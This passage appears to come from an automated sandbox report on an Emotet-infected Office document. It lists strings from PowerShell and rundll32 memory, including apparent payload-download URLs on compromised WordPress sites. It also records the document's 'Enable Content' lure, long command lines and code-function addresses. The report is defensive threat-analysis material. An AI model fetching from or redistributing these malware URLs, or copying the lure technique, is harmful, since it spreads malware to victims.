                      Source: powershell.exe, 00000005.00000003.2085953341.000000001D380000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                      Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                      Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                      Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                      Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                      Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                      Source: powershell.exe, 00000005.00000002.2096244552.000000001D307000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                      Source: powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                      Source: powershell.exe, 00000005.00000002.2086923820.0000000000373000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                      Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                      Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2086959168.00000000003B9000.00000004.00000020.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                      Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                      Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                      Source: powershell.exe, 00000005.00000002.2096237563.000000001D301000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                      Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                      Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                      Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.
                      Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.1
                      Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                      Source: rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                      Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomsta
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2088409588.0000000002F52000.00000004.00000001.sdmpString found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/P
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                      Source: powershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: https://traumfrauen-ukraine.de
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
                      Source: powershell.exe, 00000005.00000002.2086959168.00000000003B9000.00000004.00000020.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                      Source: powershell.exe, 00000005.00000002.2086959168.00000000003B9000.00000004.00000020.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                      Source: powershell.exe, 00000005.00000003.2086421803.000000001D329000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknown, Network traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknown, Network traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknown, Network traffic detected: HTTP traffic on port 49166 -> 443

                      E-Banking Fraud:

                      Yara detected Emotet

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4, Screenshot OCR: Enable Editing and Enable Content.
                      Source: Screenshot number: 4, Screenshot OCR: Enable Content.
                      Source: Screenshot number: 8, Screenshot OCR: Enable Editing and Enable Content.
                      Source: Screenshot number: 8, Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 0, Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 0, Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 1, Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 1, Screenshot OCR: Enable Content.
                      Very long command line found
                      Source: unknown, Process created: Commandline size = 5669
                      Source: unknown, Process created: Commandline size = 5568
                      Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 5568
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Itwxrtu\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F7977_2_0023F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239D957_2_00239D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024819F7_2_0024819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023FBE67_2_0023FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B3E87_2_0023B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002327F37_2_002327F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D3F57_2_0023D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0202303C7_2_0202303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020187D07_2_020187D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02031E147_2_02031E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020052508_2_02005250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF4D908_2_01FF4D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200A0F18_2_0200A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF5F048_2_01FF5F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFD2DD8_2_01FFD2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFCAA38_2_01FFCAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02000B8A8_2_02000B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020047B58_2_020047B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF48448_2_01FF4844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA8218_2_01FFA821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200CBE78_2_0200CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF64178_2_01FF6417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF7FFE8_2_01FF7FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF35FC8_2_01FF35FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02002C058_2_02002C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF67EF8_2_01FF67EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFF5E08_2_01FFF5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF2DDF8_2_01FF2DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020002238_2_02000223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF57D48_2_01FF57D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02008C2B8_2_02008C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200D02D8_2_0200D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020026318_2_02002631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02008A338_2_02008A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02004C378_2_02004C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFF9BA8_2_01FFF9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFFFBA8_2_01FFFFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF3FAF8_2_01FF3FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFADAF8_2_01FFADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFBB968_2_01FFBB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020006728_2_02000672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200AA7B8_2_0200AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF5B7D8_2_01FF5B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF73788_2_01FF7378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF3B748_2_01FF3B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020010908_2_02001090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFF3698_2_01FFF369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFC3648_2_01FFC364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02004A9E8_2_02004A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFC1458_2_01FFC145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF7B398_2_01FF7B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF39388_2_01FF3938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF33368_2_01FF3336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF77318_2_01FF7731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF9D2F8_2_01FF9D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200C6D98_2_0200C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA5258_2_01FFA525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200D4E18_2_0200D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF91068_2_01FF9106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFECFE8_2_01FFECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02004F048_2_02004F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200D70B8_2_0200D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFD6F08_2_01FFD6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA2D28_2_01FFA2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200CF318_2_0200CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFA6C98_2_01FFA6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02009B4A8_2_02009B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200434E8_2_0200434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02003F4F8_2_02003F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200135B8_2_0200135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200B1658_2_0200B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200A9668_2_0200A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFDE818_2_01FFDE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF327F8_2_01FF327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020071878_2_02007187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02001F888_2_02001F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFBE748_2_01FFBE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020035908_2_02003590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200C1928_2_0200C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02002FA18_2_02002FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020093AA8_2_020093AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_020009B88_2_020009B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFE0448_2_01FFE044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02007BBE8_2_02007BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02009DBF8_2_02009DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200DBC48_2_0200DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02006BE48_2_02006BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF54188_2_01FF5418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FFE6128_2_01FFE612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF240F8_2_01FF240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0200BBF18_2_0200BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF22088_2_01FF2208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_01FF18068_2_01FF1806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02001DFE8_2_02001DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CC0178_2_001CC017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D40128_2_001D4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D06048_2_001D0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C9C3D8_2_001C9C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DCA558_2_001DCA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CC8518_2_001CC851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DBC4D8_2_001DBC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C98468_2_001C9846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DCC7F8_2_001DCC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C54788_2_001C5478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D44788_2_001D4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CE2728_2_001CE272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D96658_2_001D9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C9A998_2_001C9A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D34BF8_2_001D34BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D90BE8_2_001D90BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB6B98_2_001CB6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2EAC8_2_001C2EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C70AD8_2_001C70AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C28AA8_2_001C28AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DC4A58_2_001DC4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C6CA58_2_001C6CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C92A38_2_001C92A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CE8DD8_2_001CE8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB8D88_2_001CB8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DA6D98_2_001DA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D9EDA8_2_001D9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D08CF8_2_001D08CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D34C38_2_001D34C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D38C28_2_001D38C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D14FC8_2_001D14FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D00FE8_2_001D00FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D66FB8_2_001D66FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C50F18_2_001C50F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C68EC8_2_001C68EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C30E88_2_001C30E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D891E8_2_001D891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D25158_2_001D2515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB10A8_2_001CB10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C43048_2_001C4304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DB7068_2_001DB706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DD1388_2_001DD138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D93338_2_001D9333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D71328_2_001D7132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CFF2C8_2_001CFF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CEF2E8_2_001CEF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CF52E8_2_001CF52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D3D298_2_001D3D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C35238_2_001C3523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CA3238_2_001CA323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D61588_2_001D6158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DC15B8_2_001DC15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CEB548_2_001CEB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C23538_2_001C2353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C4D488_2_001C4D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C177C8_2_001C177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D21798_2_001D2179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C0D7A8_2_001C0D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C2B708_2_001C2B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D13728_2_001D1372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DB1658_2_001DB165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C5D638_2_001C5D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D819F8_2_001D819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C9D958_2_001C9D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CF7978_2_001CF797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CF7938_2_001CF793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C498C8_2_001C498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C598B8_2_001C598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CDB868_2_001CDB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C19838_2_001C1983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C3DB88_2_001C3DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CD5B88_2_001CD5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D41AB8_2_001D41AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D1BA58_2_001D1BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D7FA78_2_001D7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001DC5A18_2_001DC5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CD3F58_2_001CD3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001C27F38_2_001C27F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001CB3E88_2_001CB3E8
